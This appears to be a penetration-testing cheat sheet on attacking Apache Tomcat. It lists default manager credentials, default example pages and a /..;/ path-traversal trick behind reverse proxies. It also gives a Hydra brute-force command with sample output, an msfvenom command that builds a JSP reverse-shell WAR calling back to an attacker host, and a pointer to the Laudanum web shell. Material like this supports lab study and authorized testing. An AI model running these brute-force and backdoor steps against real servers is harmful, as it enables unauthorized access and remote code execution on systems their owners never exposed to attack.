Tomcat
Attacking Tomcat Service
Default Credentials
admin:password
admin:
admin:Password1
admin:password1
admin:admin
admin:tomcat
both:tomcat
manager:manager
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:tomcat
tomcat:s3cret
tomcat:password1
tomcat:password
tomcat:
tomcat:admin
tomcat:changethis
Default Pages
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp
/docs
Tomcat Path Traversal
Web servers and reverse proxies normalize the request path. For example, the path /image/../image/ is normalized to /images/. When Apache Tomcat is used together with a reverse proxy such as nginx there is a nromalization inconsistency. Tomcat will threat the sequence /..;/ as /../ and normalize the path while reverse proxies will not normalize this sequence and send it to Apache Tomcat as it is. This allows an attacker to access Apache Tomcat resources that are not normally accessible via the reverse proxy mapping.
Reference:
Brute Force Attack
hydra -L users.txt -P passwords.txt -f 172.16.8.148 -s 8080 http-get /manager/
Example output:
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-06 21:36:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:4/p:5), ~2 tries per task
[DATA] attacking http-get://172.16.8.148:8080/manager/
[8080][http-get] host: 172.16.8.148 login: admin password: admin
[STATUS] attack finished for 172.16.8.148 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-06 21:36:02
And then, login into Tomcat Manager.

Backdooring Tomcat Manager
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.8.1 LPORT=4448 -f war -o revshell.war
Or use Laudanum cmd.war shell at /usr/share/laudanum/jsp.
β jsp tree
.
βββ cmd.war
βββ makewar.sh
βββ warfiles
βββ cmd.jsp
βββ META-INF
βΒ Β βββ MANIFEST.MF
βββ WEB-INF
βββ web.xml
4 directories, 5 files
Example of Laudanum WAR Shell

Other Tools
Update soon....
Last updated
Was this helpful?